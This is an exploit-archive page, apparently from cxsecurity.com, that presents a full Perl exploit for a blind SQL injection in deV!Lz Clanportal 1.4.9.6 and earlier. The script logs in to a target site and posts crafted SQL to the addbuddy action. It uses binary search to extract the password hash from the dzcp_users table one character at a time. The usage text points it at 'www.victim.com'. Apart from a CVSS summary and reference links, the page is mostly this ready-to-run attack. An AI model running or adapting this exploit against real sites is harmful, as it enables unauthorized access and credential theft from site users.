deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit

2008.11.05
Credit: h0yt3r
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

use HTTP::Cookies; use LWP::UserAgent; my $ua = LWP::UserAgent->new( cookie_jar => HTTP::Cookies->new,); $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); usage(); print "\n"; $server = $ARGV[0]; $dir = $ARGV[1]; $username = $ARGV[2]; $password = $ARGV[3]; if (!$password) { die "Argh! Read teh Usage!\n"; } $url0 = "http://".$server.$dir."user/index.php"; $url1 = $url0."?action=login&do=yes"; $url2 = $url0."?action=buddys&do=addbuddy"; syswrite(STDOUT, "[x]Connecting...", 16); $response = $ua->get($url0); if($response->is_success) {syswrite(STDOUT, "OK", 2);} else { print "\n[x]Ey I couldn't connect to ".$url0; exit;} print "\n"; $captcha = ($response->content =~ m/secure=login/i) ? 1 : 0; if($captcha) { captcha(); } $response = (!$captcha) ? $ua->post($url1, [ "user" => $username, "pwd" => $password ]) : $ua->post($url1, [ "user" => $username, "pwd" => $password , "secure" => $imgCode]); if($response->content =~ m/Sicherheitsscode/i) { print "[x]Lol you gave me wrong image code. Restart!"; exit; } elsif($response->content =~ m/gesperrt/i) { print "[x]Omg you gave me wrong user details. Restart!"; exit; } $response = $ua->get($url2); print "[x]Kay, unleashing BlackMagic now. Getta Coffee and wait!!\n"; my @Daten; array(); my $operator; syswrite(STDOUT, "[x]Password: ", 13); for($b=1;$b<=32;$b++) { inject(0,16); } print "\n[x]OmFg I made it!!\n"; print "[x]Have FUN!\n"; print "[x]Greetz & Shoutz go to: IP-Sh0k, haZl0oh, bizzit, NoNePub, thund3r ,ramon,\n"; print " J0hn.X3r, electron1x, Paloxus, -tmh- aka B-Baerchi, Nazrek aka Patrick_B, WooMic, codeblu815\n"; print " Free-Hack, Sys-Flaw, SoH and h4ck-y0u!\n"; print "[x]Biggest Thanks go to Shadowleet aka \$h4d0wl33t who is simply the best at his stuff!"; sub hex_to_ascii($) { (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg; return $str; } sub inject { $beg = $_[0]; $end = $_[1]; $mid = int(($beg + $end)/2); #print $mid."\n"; if(&equals($mid)) { syswrite(STDOUT, hex_to_ascii($Daten[$mid]), 1); return; } elsif(&bigger($mid)) { return inject($mid + 1, $end); } else { return inject($beg, $mid - 1); } } sub equals { $ack = $_[0]; if( &request("=", $ack) !~ m/1242/i) { return 1; } } sub bigger { $ack = $_[0]; if(&request(">", $ack) !~ m/1242/i) { return 1; } } sub request { $operator = $_[0]; $bick = $_[1]; #probably only users without dzcp_ $response = $ua->post($url2, [ "users" => "999 and if(substring((select pwd from dzcp_users limit 0,1),".$b.",1)".$operator."0x".$Daten[$bick].",null,(select 1 union select 2))" ]); #print $response->content; return $response->content; } sub usage() { print q { ------------------NON PUBLIC EXPLOIT----------------- ##################################################### deV!L`z Clanportal BlackMagic EXPLOIT -Exploit coded by h0yt3r- Usage: devilz.pl [Server] [Path] [Username] [Password] Sample: perl devilz.pl www.victim.com /devilz/ h0yt3r 1337 Exploit requires Username and Password, as the vul- nerable file is only visible for registered users! ##################################################### }; } sub captcha { print "[x]Captcha required!\n"; $captchaURL = "http://".$server.$dir."/antispam.php?secure=login"; my $captchaReq= $ua->get($captchaURL); open(IMG,">captcha.jpg"); binmode IMG; print IMG $captchaReq->content; close IMG; system('start captcha.jpg'); print "[x]Image Code: "; $imgCode = <STDIN>; chop($imgCode); } sub array { for($b=30;$b<=39; $b++) { push(@Daten,$b); } for($b=61;$b<=66; $b++) { push(@Daten,$b); } }

Referencje:

http://www.securityfocus.com/bid/32049
http://www.milw0rm.com/exploits/6961
http://secunia.com/advisories/32458


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top